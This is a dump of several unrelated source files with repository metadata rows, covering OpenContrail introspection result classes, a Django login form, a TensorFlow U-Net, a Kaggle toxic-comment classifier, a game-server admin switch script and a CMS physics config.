u'uuid': u'6a5c5c29-cfe6-4fea-9768-b0dea3b217bc'}}
'''
_pat = None
def _rpat(self):
if self._pat is None:
self._pat = re.compile('-interface/.*$')
return self._pat
def sub(self, st, _id):
return self._rpat().sub('/%s' % _id, st)
def fq_name(self):
return ':'.join(self.xpath('virtual-network', 'fq_name'))
def fip_list(self):
return self.xpath('virtual-network', 'floating_ip_pools')
def fip(self, fip):
return filter(lambda x: x['to'][-1] == fip, self.fip_list())
def vm_link_list(self):
return map(lambda x: self.sub(x['href'], x['to'][0]),
self.xpath('virtual-network',
'virtual_machine_interface_back_refs'))
def rts(self):
if self.xpath('virtual-network').has_key('route_target_list'):
for rt in self.xpath('virtual-network', 'route_target_list',
'route_target'):
yield rt
def ri_links(self):
if self.xpath('virtual-network').has_key('routing_instances'):
for ri in self.xpath('virtual-network', 'routing_instances'):
yield ri['href']
def ri_refs(self):
if self.xpath('virtual-network').has_key('routing_instances'):
for ri in self.xpath('virtual-network', 'routing_instances'):
yield ri['to']
def uuid(self):
return self.xpath('virtual-network', 'uuid')
def route_table(self):
return self.xpath('virtual-network', 'route_table_refs', 0)
@property
def is_shared(self):
return self.xpath('virtual-network', 'is_shared')
def global_access(self):
return self.xpath('virtual-network', 'perms2', 'global_access')
@property
def virtual_network_properties(self):
return self.xpath('virtual-network', 'virtual_network_properties')
class CsRtResult (Result):
'''
CsRtResult to provide access to vnc_introspect_utils.get_cs_route_targets
dict contrains:
'''
def fq_name(self):
return ':'.join(self.xpath('route-table', 'fq_name'))
class CsRiResult (Result):
'''
CsRiResult to provide access to vnc_introspect_utils.get_cs_routing_instances
dict contrains:
'''
def rt_links(self):
if self.xpath('routing-instance').has_key('route_target_refs'):
for rt in self.xpath('routing-instance', 'route_target_refs'):
yield rt['href']
def get_rt(self):
target = list()
if self.xpath('routing-instance').has_key('route_target_refs'):
for rt in self.xpath('routing-instance', 'route_target_refs'):
target.append(rt['to'][0])
return target
class CsAllocFipPoolResult (Result):
'''
CsVMResult to provide access to vnc_introspect_utils.get_cs_vm
dict contrains:
'''
pass
class CsVMResult (Result):
'''
CsVMResult to provide access to vnc_introspect_utils.get_cs_vm
dict contrains:
'''
def fq_name(self):
return ':'.join(self.xpath('virtual-machine', 'fq_name'))
def vr_link(self):
return self.xpath('virtual-machine', 'virtual_router_back_refs',
0, 'href')
def vmi_links(self):
vmi_list = (self.xpath('virtual-machine', 'virtual_machine_interfaces') or
self.xpath('virtual-machine', 'virtual_machine_interface_back_refs')) or []
links = []
for vmi in vmi_list or []:
links.append(vmi['href'])
return links
# return self.xpath ('virtual-machine', 'virtual_machine_interfaces',
# 0, 'href')
def service_instance_refs(self):
si_refs = self.xpath('virtual-machine', 'service_instance_refs')
return si_refs
class CsVMIResult (Result):
def get_bindings(self):
bindings = self.xpath('virtual-machine-interface',
'virtual_machine_interface_bindings',
'key_value_pair')
bdict = dict()
for binding in bindings:
bdict[binding['key']] = binding['value']
return bdict
class CsVrOfVmResult (Result):
def name(self):
return self.xpath('name')
class CsVmiOfVmResult (Result):
def ip_link(self):
links = []
instance_ips = self.xpath('virtual-machine-interface',
'instance_ip_back_refs')
for iip in instance_ips or []:
links.append(iip['href'])
return links
def fip_link(self):
if self.xpath('virtual-machine-interface').has_key(
'floating_ip_back_refs'):
return self.xpath('virtual-machine-interface',
'floating_ip_back_refs', 0, 'href')
def properties(self, property=None):
if self.xpath('virtual-machine-interface').has_key(
'virtual_machine_interface_properties'):
if property:
return self.xpath('virtual-machine-interface',
'virtual_machine_interface_properties', property)
else:
return self.xpath('virtual-machine-interface',
'virtual_machine_interface_properties')
@property
def uuid(self):
return self.xpath('virtual-machine-interface', 'uuid')
@property
def vn_fq_name(self):
return ':'.join(self.xpath('virtual-machine-interface',
'virtual_network_refs', 0, 'to'))
@property
def vn_uuid(self):
return self.xpath('virtual-machine-interface',
'virtual_network_refs', 0, 'uuid')
@property
def mac_addr(self):
return self.xpath('virtual-machine-interface',
'virtual_machine_interface_mac_addresses',
'mac_address', 0)
class CsIipOfVmResult (Result):
@property
def ip(self):
return self.xpath('instance-ip', 'instance_ip_address')
@property
def vn_uuid(self):
return self.xpath('instance-ip', 'virtual_network_refs', 0, 'uuid')
@property
def vn_fq_name(self):
return ':'.join(self.xpath('instance-ip',
'virtual_network_refs', 0, 'to'))
class CsFipOfVmResult (Result):
def ip(self):
return self.xpath('floating-ip', 'floating_ip_address')
class CsFipIdResult (Result):
'''
CsFipIdResult to provide access to vnc_introspect_utils.get_cs_fip
dict contrains:
'''
def fip(self):
return self.xpath('floating-ip', 'floating_ip_address')
def vmi(self):
return [vmi['uuid'] for vmi in self.xpath('floating-ip',
'virtual_machine_interface_refs') or []]
class CsSecurityGroupResult (Result):
'''
CsSecurityGroupResult to provide access to vnc_introspect_utils.get_cs_secgrp
'''
def fq_name(self):
return ':'.join(self.xpath('security-group', 'fq_name'))
class CsVirtualMachineInterfaceResult (Result):
'''
CsVirtualMachineInterfaceResult to provide access to vnc_introspect_utils.get_cs_vmi
'''
def uuid(self):
return ':'.join(self.xpath('virtual-machine-interface', 'uuid'))
def fq_name(self):
return ':'.join(self.xpath('virtual-machine-interface', 'fq_name'))
class CsPortTupleResult (Result):
'''
CsPortTupleResult to provide access to vnc_introspect_utils.get_cs_pt
'''
def uuid(self):
return ':'.join(self.xpath('port-tuple', 'uuid'))
def fq_name(self):
return ':'.join(self.xpath('port-tuple', 'fq_name'))
class CsServiceInstanceResult (Result):
'''
CsServiceInstanceResult to provide access to vnc_introspect_utils.get_cs_si
'''
def fq_name(self):
return ':'.join(self.xpath('service-instance', 'fq_name'))
def get_vms(self):
vms = list()
if self.xpath('service-instance').has_key('virtual_machine_back_refs'):
for vm in self.xpath('service-instance', 'virtual_machine_back_refs'):
vms.append(vm['uuid'])
return vms
class CsServiceTemplateResult (Result):
'''
CsServiceTemplateResult to provide access to vnc_introspect_utils.get_cs_st
'''
def fq_name(self):
return ':'.join(self.xpath('service-template', 'fq_name'))
class CsGlobalVrouterConfigResult (Result):
'''
CsGlobalVrouterConfigResult to provide access to vnc_introspect_utils.get_global_vrouter_config
'''
def get_link_local_service(self, name='metadata'):
link_local_service = {}
try:
p = self.xpath('global-vrouter-config', 'linklocal_services')
for elem in p['linklocal_service_entry']:
if (elem['linklocal_service_name'] == name):
link_local_service['name'] = elem['linklocal_service_name']
link_local_service['service_ip'] = elem[
'linklocal_service_ip']
link_local_service['service_port'] = elem[
'linklocal_service_port']
link_local_service['fabric_service_ip'] = elem[
'ip_fabric_service_ip']
link_local_service['fabric_DNS_service_name'] = elem[
'ip_fabric_DNS_service_name']
link_local_service['ip_fabric_service_port'] = elem[
'ip_fabric_service_port']
except Exception as e:
print e
finally:
return link_local_service
class CsLogicalRouterResult(Result):
'''
CsLogicalRouterResult access logical router dict
'''
def get_rt(self):
target = list()
if self.xpath('logical-router').has_key('route_target_refs'):
for rt in self.xpath('logical-router', 'route_target_refs'):
target.append(rt['to'][0])
return target
def fq_name(self):
return ':'.join(self.xpath('logical-router', 'fq_name'))
def uuid(self):
return self.xpath('logical-router', 'uuid')
class CsTableResult(Result):
'''
CsTableResult access Route table dict
'''
def get_route(self):
if self.xpath('route-table').has_key('routes'):
return self.xpath('route-table', 'routes', 'route')
def fq_name(self):
return ':'.join(self.xpath('route-table', 'fq_name'))
def uuid(self):
return self.xpath('route-table', 'uuid')
class CsLoadbalancer(Result):
'''
CsLoadbalancer access Load Balancer dict
'''
def fq_name(self):
return ':'.join(self.xpath('loadbalancer', 'fq_name'))
def uuid(self):
return self.xpath('loadbalancer', 'uuid')
def name(self):
return self.xpath('loadbalancer', 'name')
def si(self):
return self.xpath('loadbalancer', 'service_instance_refs', 0, 'uuid')
class CsLbPool(Result):
'''
CsLbPool access Load Balancer Pool dict
'''
def fq_name(self):
return ':'.join(self.xpath('loadbalancer-pool', 'fq_name'))
def uuid(self):
return self.xpath('loadbalancer-pool', 'uuid')
def name(self):
return self.xpath('loadbalancer-pool', 'name')
def members(self):
members = list()
for member in self.xpath('loadbalancer-pool', 'loadbalancer_members') or []:
members.append(member['uuid'])
return members
def hmons(self):
hmons = list()
for hmon in self.xpath('loadbalancer-pool',
'loadbalancer_healthmonitor_refs') or []:
hmons.append(hmon['uuid'])
return hmons
def vip(self):
return self.xpath('loadbalancer-pool', 'virtual_ip_back_refs', 0,'uuid')
def si(self):
return self.xpath('loadbalancer-pool', 'service_instance_refs',0,'uuid')
def properties(self):
return self.xpath('loadbalancer-pool', 'loadbalancer_pool_properties')
def custom_attrs(self):
custom_attr = dict()
kvpairs = self.xpath('loadbalancer-pool',
'loadbalancer_pool_custom_attributes',
'key_value_pair') or []
for dct in kvpairs:
custom_attr[dct['key']] = dct['value']
return custom_attr
class CsLbMember(Result):
'''
CsLbMember access Load Balancer Member dict
'''
def fq_name(self):
return ':'.join(self.xpath('loadbalancer-member', 'fq_name'))
def uuid(self):
return self.xpath('loadbalancer-member', 'uuid')
def ip(self):
return self.xpath('loadbalancer-member',
'loadbalancer_member_properties',
'address')
class CsLbVip(Result):
'''
CsLbVip access Load Balancer Vip dict
'''
def fq_name(self):
return ':'.join(self.xpath('virtual-ip', 'fq_name'))
def uuid(self):
return self.xpath('virtual-ip', 'uuid')
def ip(self):
return self.xpath('virtual-ip', 'virtual_ip_properties', 'address')
def vmi(self):
return self.xpath('virtual-ip',
'virtual_machine_interface_refs',
0, 'uuid')
class CsLbHealthMonitor(Result):
'''
CsLbHealthMonitor access Load Balancer Health Monitor dict
'''
def fq_name(self):
return ':'.join(self.xpath('loadbalancer-healthmonitor', 'fq_name'))
def uuid(self):
return self.xpath('loadbalancer-healthmonitor', 'uuid')
def properties(self):
return self.xpath('loadbalancer-healthmonitor', 'loadbalancer_healthmonitor_properties')
class CsVrouters(Result):
def __iter__(self):
for vrouter in self.xpath('virtual-routers'):
yield vrouter
class CsVrouter(Result):
def is_tor_agent(self):
vr_type = self.xpath('virtual-router', 'virtual_router_type')
if vr_type and 'tor-agent' == vr_type.lower():
return True
return False
def is_tsn(self):
vr_type = self.xpath('virtual-router', 'virtual_router_type')
if vr_type and 'tor-service-node' == vr_type.lower():
return True
return False
@property
def ip(self):
return self.xpath('virtual-router', 'virtual_router_ip_address')
class CsBGPaaSResult(Result):
'''
CsBGPaaSResult access bgp_as_a_service dict
'''
def fq_name(self):
return ':'.join(self.xpath('bgp-as-a-service', 'fq_name'))
def uuid(self):
return self.xpath('bgp-as-a-service', 'uuid')
def bgpaas_shared(self):
return self.xpath('bgp-as-a-service', 'bgpaas_shared')
def bgpaas_ip_address(self):
return self.xpath('bgp-as-a-service', 'bgpaas_ip_address')
def autonomous_system(self):
return self.xpath('bgp-as-a-service', 'autonomous_system')
class CsHealthCheckResult(Result):
'''
CsHealthCheckResult access service health check dict
'''
def fq_name(self):
return ':'.join(self.xpath('service-health-check', 'fq_name'))
def uuid(self):
return self.xpath('service-health-check', 'uuid')
def properties(self, attr):
return self.xpath('service-health-check',
'service_health_check_properties',
attr)
@property
def health_check_type(self):
return self.properties('health_check_type')
@property
def status(self):
return self.properties('enabled')
@property
def probe_type(self):
return self.properties('monitor_type')
@property
def delay(self):
return self.properties('delay')
@property
def timeout(self):
return self.properties('timeout')
@property
def max_retries(self):
return self.properties('max_retries')
@property
def http_url(self):
return self.properties('url_path')
@property
def http_method(self):
return self.properties('http_method')
@property
def http_codes(self):
return self.properties('expected_codes')
class CsApiAccessList(Result):
def fq_name(self):
return ':'.join(self.xpath('api-access-list', 'fq_name'))
def uuid(self):
return self.xpath('api-access-list', 'uuid')
def get_rules(self):
return self.xpath('api-access-list', 'api_access_list_entries', 'rbac_rule')
class CsBridgeDomainResult(Result):
def fq_name(self):
return ':'.join(self.xpath('bridge_domain', 'fq_name'))
def name(self):
return self.xpath('bridge_domain', 'name')
| [
"[email protected]"
]
| |
f5aa2f0a35d71460c6b936f9fe19313a0a13913b | 1a3234c1deeb8987fb4c5b424e6485ddd10c8ace | /estagios/core/form.py | 021338a4415b61c90edc91e57e34b3d1b2660f03 | []
| no_license | orlandosaraivajr/estagio | 0c46b16fccf52861f68431a88032ba0fdc46bf66 | 439b797406c82673e9972eee373d60f844679a9c | refs/heads/master | 2022-05-14T14:15:53.109355 | 2020-04-03T05:58:13 | 2020-04-03T05:58:13 | 189,227,824 | 0 | 0 | null | 2022-04-22T21:20:07 | 2019-05-29T13:09:14 | CSS | UTF-8 | Python | false | false | 1,632 | py | from django import forms
from django.forms import ModelForm
from estagios.core.models import User
class LoginForm(ModelForm):
class Meta:
model = User
fields = ['email', 'password']
labels = {
'email': 'E-mail',
'password': 'Senha'
}
widgets = {
'email': forms.EmailInput(attrs={'class': 'form-control'}),
'password': forms.PasswordInput(attrs={'class': 'form-control'})
}
help_texts = {
'email': ('E-mail cadastrado.'),
'password': ('Senha para acesso.'),
}
error_messages = {
'email': {
'required': ("Digite um e-mail válido."),
},
'password': {
'required': ("Senha não pode ser em branco."),
}
}
class NomeCompletoForm(ModelForm):
error_css_class = "error"
class Meta:
model = User
fields = ('first_name',)
labels = {
'first_name': 'Nome Completo',
}
widgets = {
'first_name': forms.TextInput(
attrs={
'class': 'form-control',
'placeholder': 'Preencha seu nome completo.'
}
),
}
error_messages = {
'first_name': {
'required': ("Não deixe este campo em branco. Informe seu nome completo."),
},
}
def clean_first_name(self):
if self.cleaned_data['first_name'] != '':
return self.cleaned_data['first_name']
return 'Nome em Branco'
| [
"[email protected]"
]
| |
2599ba25172f8c4d5bf9dfd7c2d42ef2a622b096 | 48a522b031d45193985ba71e313e8560d9b191f1 | /baekjoon/python/10406.py | 14779fe2b517e02188eedca6e18f8062aa9d26ff | []
| no_license | dydwnsekd/coding_test | beabda0d0aeec3256e513e9e0d23b43debff7fb3 | 4b2b4878408558239bae7146bb4f37888cd5b556 | refs/heads/master | 2023-09-04T12:37:03.540461 | 2023-09-03T15:58:33 | 2023-09-03T15:58:33 | 162,253,096 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | import sys
count = 0
w, n, p = map(int, sys.stdin.readline().split())
punch_list = list(map(int, sys.stdin.readline().split()))
for punch in punch_list:
if w <= punch <= n:
count += 1
print(count)
| [
"[email protected]"
]
| |
13ff38fd624a28f8e31a89d15df14a35ccd208fa | 9ecf55bf2601e0d4f74e71f4903d2fd9e0871fd6 | /my_seg_tf/v4_128_128/model/unet.py | ba7e761f74f601823dd64cf81e8c08124d5f3053 | []
| no_license | qq191513/mySeg | 02bc9803cde43907fc5d96dc6a6a6371f2bef6fe | 4337e6a0ca50b8ccbf6ed9b6254f2aec814b24db | refs/heads/master | 2020-04-10T09:57:37.811133 | 2019-06-26T08:21:23 | 2019-06-26T08:21:23 | 160,951,962 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,033 | py | import os
import tensorflow as tf
import sys
sys.path.append('../')
import config as cfg
lr_init = cfg.lr_init
class Unet(object):
def __init__(self, sess, config, is_train):
self.sess = sess
self.name = 'Unet'
self.mask = config.mask
self.ckpt_dir = config.ckpt_dir
self.is_train = is_train
self.images = tf.placeholder(tf.float32, [config.batch_size, config.input_shape[0], config.input_shape[1], config.input_shape[2]]) #initially 512,512,3 for Gray Images
self.labels = tf.placeholder(tf.float32, [config.batch_size, config.labels_shape[0], config.labels_shape[1], config.labels_shape[2]]) #initially 512,512, 256 for Binary Segmentation
self.pred = self.build(self.images)
# self.accuracy = self.compute_acc(self.recons, self.labels)
self.loss = self.compute_loss( self.labels, self.pred)
self.t_vars = tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name)
self.sess.run(tf.variables_initializer(self.t_vars))
self.saver = tf.train.Saver()
if not tf.gfile.Exists(self.ckpt_dir):
tf.gfile.MakeDirs(self.ckpt_dir)
self.summary_writer = tf.summary.FileWriter(self.ckpt_dir)
self.summary_op = tf.summary.merge(self.loss_summaries)
# self.summary_op = tf.summary.merge(self.acc_summaries)
self.optim = tf.train.AdamOptimizer(lr_init) #use NadamOptmizer
self.train = self.optim.minimize(self.loss)
def fit(self, images, labels, summary_step=-1):
if summary_step >= 0:
# _, loss_val,acc_val, summary_str = self.sess.run(
# [self.train, self.loss, self.acc,self.summary_op],
# {self.images:images, self.labels:labels})
# self.summary_writer.add_summary(summary_str, summary_step)
_,loss_val, summary_str = self.sess.run(
[self.train, self.loss, self.summary_op],
{self.images: images, self.labels: labels})
self.summary_writer.add_summary(summary_str, summary_step)
else :
# _, loss_val,acc_val = self.sess.run(
# [self.train, self.loss,self.acc],
# {self.images:images, self.labels:labels})
_, loss_val = self.sess.run(
[self.train, self.loss],
{self.images: images, self.labels: labels})
return loss_val
def predict(self, images):
result = self.sess.run([self.pred], {self.images:images})
return result
def compute_loss(self, labels,pred):
dice_loss = self.dice_coef_loss(labels, pred)
self.loss_summaries = [
tf.summary.scalar("dice_loss", dice_loss)]
total_loss = dice_loss
return total_loss
def build(self, images):
# with tf.variable_scope(self.name):
conv1 = self.conv2d(images, 64, 3)
conv1 = self.conv2d(conv1, 64, 3)
pool1 = self.maxpooling2d(conv1,[2,2])
conv2 = self.conv2d(pool1, 128, 3)
conv2 = self.conv2d(conv2, 128, 3)
pool2 = self.maxpooling2d(conv2,[2,2])
conv3 = self.conv2d(pool2, 256, 3)
conv3 = self.conv2d(conv3, 256, 3)
pool3 = self.maxpooling2d(conv3,[2,2])
conv4 = self.conv2d(pool3, 512, 3)
conv4 = self.conv2d(conv4, 512, 3)
up5 = tf.concat([self.conv2d_transpose(conv4,256,3), conv3], axis=3)
conv5 = self.conv2d(up5, 256, 3)
conv5 = self.conv2d(conv5, 256, 3)
up6 = tf.concat([self.conv2d_transpose(conv5,256,3), conv4], axis=3)
conv6 = self.conv2d(up6, 128, 3)
conv6 = self.conv2d(conv6, 128, 3)
up7 = tf.concat([self.conv2d_transpose(conv6,256,3), conv5], axis=3)
conv7 = self.conv2d(up7, 64, 3)
conv7 = self.conv2d(conv7, 64, 3)
conv8 = self.conv2d(conv7, 16, 1)
out = tf.squeeze(conv8, axis=3) # tf.squeeze remove the dimensions of value 1
print("shape of squeezed vector:", out.get_shape())
return out
def conv2d(self, x, channel, kernel, stride=1, padding="SAME",activation='relu'):
return tf.layers.conv2d(x, channel, kernel, stride, padding, activation,kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
def maxpooling2d(self,inputs,pool_size, strides,padding='valid', data_format='channels_last',name=None):
return tf.layers.max_pooling2d(inputs,pool_size, strides,padding=padding, data_format=data_format,name=name)
def conv2d_transpose(self, x, channel, kernel, stride=1, padding="SAME"):
return tf.layers.conv2d_transpose(x, channel, kernel, stride, padding,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
def save(self,epoch):
print('saving model.......')
self.saver.save(self.sess, os.path.join(self.ckpt_dir, "model_{}.ckpt".format(epoch)))
def restore(self,name):
print('restoring model: {}.......'.format(name))
self.saver.restore(self.sess, os.path.join(self.ckpt_dir, name))
| [
"[email protected]"
]
| |
d369fd4de101726338d35665b676a132ab6c4567 | 32cb0be487895629ad1184ea25e0076a43abba0a | /LifePictorial/top/api/rest/CrmShopvipCancelRequest.py | c82fb8fafe43c8edd71af72a729843b38b0af2af | []
| no_license | poorevil/LifePictorial | 6814e447ec93ee6c4d5b0f1737335601899a6a56 | b3cac4aa7bb5166608f4c56e5564b33249f5abef | refs/heads/master | 2021-01-25T08:48:21.918663 | 2014-03-19T08:55:47 | 2014-03-19T08:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | '''
Created by auto_sdk on 2014-02-10 16:59:30
'''
from top.api.base import RestApi
class CrmShopvipCancelRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
def getapiname(self):
return 'taobao.crm.shopvip.cancel'
| [
"[email protected]"
]
| |
f4139ba7b59e752ce0180da1c48a07365de98486 | c839961aeab22795200d9edef9ba043fe42eeb9c | /data/script1014.py | dabede7bc768ce46066e92849eee030bf819e85c | []
| no_license | StevenLOL/kaggleScape | ad2bb1e2ed31794f1ae3c4310713ead1482ffd52 | 18bede8420ab8d2e4e7c1eaf6f63280e20cccb97 | refs/heads/master | 2020-03-17T05:12:13.459603 | 2018-05-02T19:35:55 | 2018-05-02T19:35:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,147 | py |
# coding: utf-8
# In[ ]:
# Inspiration 1: https://www.kaggle.com/tunguz/logistic-regression-with-words-and-char-n-grams/code
# Inspiration 2: https://www.kaggle.com/jhoward/nb-svm-strong-linear-baseline
import pandas as pd
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
import re, string
import time
from scipy.sparse import hstack
from scipy.special import logit, expit
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import roc_auc_score
# In[ ]:
# Functions
def tokenize(s): return re_tok.sub(r' \1 ', s).split()
def pr(y_i, y, x):
p = x[y==y_i].sum(0)
return (p+1) / ((y==y_i).sum()+1)
def get_mdl(y,x, c0 = 4):
y = y.values
r = np.log(pr(1,y,x) / pr(0,y,x))
m = LogisticRegression(C= c0, dual=True)
x_nb = x.multiply(r)
return m.fit(x_nb, y), r
def multi_roc_auc_score(y_true, y_pred):
assert y_true.shape == y_pred.shape
columns = y_true.shape[1]
column_losses = []
for i in range(0, columns):
column_losses.append(roc_auc_score(y_true[:, i], y_pred[:, i]))
return np.array(column_losses).mean()
# In[ ]:
model_type = 'lrchar'
todate = time.strftime("%d%m")
# # Data
# In[ ]:
# read data
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
subm = pd.read_csv('../input/sample_submission.csv')
id_train = train['id'].copy()
id_test = test['id'].copy()
# add empty label for None
label_cols = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
train['none'] = 1-train[label_cols].max(axis=1)
# fill missing values
COMMENT = 'comment_text'
train[COMMENT].fillna("unknown", inplace=True)
test[COMMENT].fillna("unknown", inplace=True)
# In[ ]:
# Tf-idf
# prepare tokenizer
re_tok = re.compile(f'([{string.punctuation}“”¨«»®´·º½¾¿¡§£₤‘’])')
# create sparse matrices
n = train.shape[0]
#vec = TfidfVectorizer(ngram_range=(1,2), tokenizer=tokenize, min_df=3, max_df=0.9, strip_accents='unicode',
# use_idf=1, smooth_idf=1, sublinear_tf=1 )
word_vectorizer = TfidfVectorizer(
tokenizer=tokenize,
sublinear_tf=True,
strip_accents='unicode',
analyzer='word',
min_df = 5,
token_pattern=r'\w{1,}',
ngram_range=(1, 3))
# ,
# max_features=250000)
all1 = pd.concat([train[COMMENT], test[COMMENT]])
word_vectorizer.fit(all1)
xtrain1 = word_vectorizer.transform(train[COMMENT])
xtest1 = word_vectorizer.transform(test[COMMENT])
char_vectorizer = TfidfVectorizer(
sublinear_tf=True,
strip_accents='unicode',
analyzer='char',
min_df = 3,
ngram_range=(1, 6))
# ,
# max_features=250000)
all1 = pd.concat([train[COMMENT], test[COMMENT]])
char_vectorizer.fit(all1)
xtrain2 = char_vectorizer.transform(train[COMMENT])
xtest2 = char_vectorizer.transform(test[COMMENT])
# # Model
# In[ ]:
nfolds = 5
xseed = 29
cval = 4
# data setup
xtrain = hstack([xtrain1, xtrain2], format='csr')
xtest = hstack([xtest1,xtest2], format='csr')
ytrain = np.array(train[label_cols].copy())
# stratified split
skf = StratifiedKFold(n_splits= nfolds, random_state= xseed)
# storage structures for prval / prfull
predval = np.zeros((xtrain.shape[0], len(label_cols)))
predfull = np.zeros((xtest.shape[0], len(label_cols)))
scoremat = np.zeros((nfolds,len(label_cols) ))
score_vec = np.zeros((len(label_cols),1))
# In[ ]:
for (lab_ind,lab) in enumerate(label_cols):
y = train[lab].copy()
print('label:' + str(lab_ind))
for (f, (train_index, test_index)) in enumerate(skf.split(xtrain, y)):
# split
x0, x1 = xtrain[train_index], xtrain[test_index]
y0, y1 = y[train_index], y[test_index]
# fit model for prval
m,r = get_mdl(y0,x0, c0 = cval)
predval[test_index,lab_ind] = m.predict_proba(x1.multiply(r))[:,1]
scoremat[f,lab_ind] = roc_auc_score(y1,predval[test_index,lab_ind])
# fit model full
m,r = get_mdl(y,xtrain, c0 = cval)
predfull[:,lab_ind] += m.predict_proba(xtest.multiply(r))[:,1]
print('fit:'+ str(lab) + ' fold:' + str(f) + ' score:%.6f' %(scoremat[f,lab_ind]))
# break
predfull /= nfolds
# In[ ]:
score_vec = np.zeros((len(label_cols),1))
for ii in range(len(label_cols)):
score_vec[ii] = roc_auc_score(ymat[:,ii], predval[:,ii])
print(score_vec.mean())
print(multi_roc_auc_score(ymat, predval))
# # Store resultss
# In[ ]:
# store prval
prval = pd.DataFrame(predval)
prval.columns = label_cols
prval['id'] = id_train
prval.to_csv('prval_'+model_type+'x'+str(cval)+'f'+str(nfolds)+'_'+todate+'.csv', index= False)
# store prfull
prfull = pd.DataFrame(predfull)
prfull.columns = label_cols
prfull['id'] = id_test
prfull.to_csv('prfull_'+model_type+'x'+str(cval)+'f'+str(nfolds)+'_'+todate+'.csv', index= False)
# store submission
submid = pd.DataFrame({'id': subm["id"]})
submission = pd.concat([submid, pd.DataFrame(prfull, columns = label_cols)], axis=1)
submission.to_csv('sub_'+model_type+'x'+str(cval)+'f'+str(nfolds)+'_'+todate+'.csv', index= False)
| [
"[email protected]"
]
| |
1aa72e7f053db9d44e6084691888488c1d1da4e8 | b1baabe0f34a5595af3f9587b357155590f76569 | /switcher | 44806892454dc8ccc7239c8c9d4a227f32075524 | []
| no_license | anson-tang/3dkserver | cb41269801ec97d747bb7b853841c7ad4921ad94 | 4fec66a0e1c8454252f53bc9ba41ce220357f7e4 | refs/heads/master | 2021-01-19T05:27:11.555032 | 2016-06-22T01:13:04 | 2016-06-22T01:13:04 | 60,994,700 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,350 | #!/usr/bin/env python
#-*-coding: utf-8-*-
import sys, os
from os.path import abspath, dirname, join, normpath
PREFIX = normpath( dirname( abspath( __file__ ) ) )
lib_path = normpath( join( PREFIX, 'lib' ) )
if lib_path not in sys.path: sys.path = [ lib_path ] + sys.path
from twisted.internet import reactor, defer
from rpc import ConnectorCreator
from setting import GATEWAYSERVER
from utils import print_e
cmd = None
seconds = 0
uids_admin_want_add = []
USAGE = '''{0}
[ USAGE ]:
./switcher on 打开游戏区。
./switcher status 查看游戏区当前状态。
./switcher off 关闭游戏区,但不需要停止服务器。
./switcher off 0 关闭游戏区,但不需要停止服务器。
./switcher off N 关闭游戏区,广播所有线上客户端,N + 3秒后游戏区所有进程停止。
./switcher add accountname accountname accountname 增加Admin账号,在游戏区关闭的情况下,仍然可以正常进入游戏。
'''
def switch( p ):
switch_on = ( cmd == 'on' )
return p.call( 'gm_server_status_switch', ( switch_on, seconds ) )
def add_admin( p ):
return p.call( 'gm_add_admin_user', uids_admin_want_add )
def status( p ):
return p.call( 'gm_server_status', None)
def usage( err ):
print USAGE.format( '[ E ]: ' + str( err ) if err else '' )
return False
def parse_argv():
global cmd, switch_on, seconds, uids_admin_want_add
_argv = sys.argv
_l = len( _argv )
if _l < 2:
return usage( '命令不正确。' )
else:
cmd = _argv[1].strip()
if cmd in ( 'on', 'off', 'status' ) and _l == 2:
return True
else:
if cmd == 'off' and _l == 3:
try:
seconds = int( _argv[2] )
except:
return usage( '倒计时格式不正确。' )
elif cmd == 'add' and _l >= 3:
try:
uids_admin_want_add = map( lambda s:s.strip(), _argv[2:] )
except:
return usage( '用户账号格式不正确。' )
else:
return usage( '未知错误。' )
return True
@defer.inlineCallbacks
def connected( p ):
res = None
if parse_argv():
if p:
try:
if cmd == 'add':
res = yield add_admin( p )
elif cmd == 'status':
res = yield status( p )
elif cmd in ( 'on', 'off' ):
res = yield switch( p )
else:
usage( '{0}: {1}'.format( '未知命令', cmd ) )
except:
print_e()
print '[ connected ]OK. cmd', cmd, 'and res([1, 1] means executed successfully)', res
else:
print '[ failed ]connect to {0} : {1} failed'.format(GATEWAYSERVER['localhost'], GATEWAYSERVER['port'])
reactor.stop()
def failed(error):
print '[ failed ]connect failed. error', error.getErrorMessage()
reactor.stop()
def main():
ConnectorCreator( None ).connect(GATEWAYSERVER['localhost'], GATEWAYSERVER['port'], timeout = 1).addCallbacks( connected, failed )
reactor.run()
if __name__ == '__main__': main()
| [
"[email protected]"
]
| ||
c53a010937b63e46766486a720a1459d0abc48db | f31fda8014ecadf6af7d4e3392fb917c49e0352a | /HeavyIonsAnalysis/JetAnalysis/python/jets/akPuFilter1PFJetSequence_PbPb_jec_cff.py | 9ab5f0e173560a4a0aafa9aeb1a3c4177253b7eb | []
| no_license | jniedzie/lightbylight | acea5051f053c49824a49a0b78bac3a2247ee75f | f5a4661fcf3fd3c0e9ccd8893a46a238e30c2aa8 | refs/heads/master | 2020-03-18T12:24:31.970468 | 2018-02-09T15:50:00 | 2018-02-09T15:50:00 | 134,724,759 | 0 | 1 | null | 2018-05-24T14:11:12 | 2018-05-24T14:11:12 | null | UTF-8 | Python | false | false | 15,089 | py |
import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.patHeavyIonSequences_cff import patJetGenJetMatch, patJetPartonMatch, patJetCorrFactors, patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
akPuFilter1PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("akPuFilter1PFJets"),
matched = cms.InputTag("ak1HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.1
)
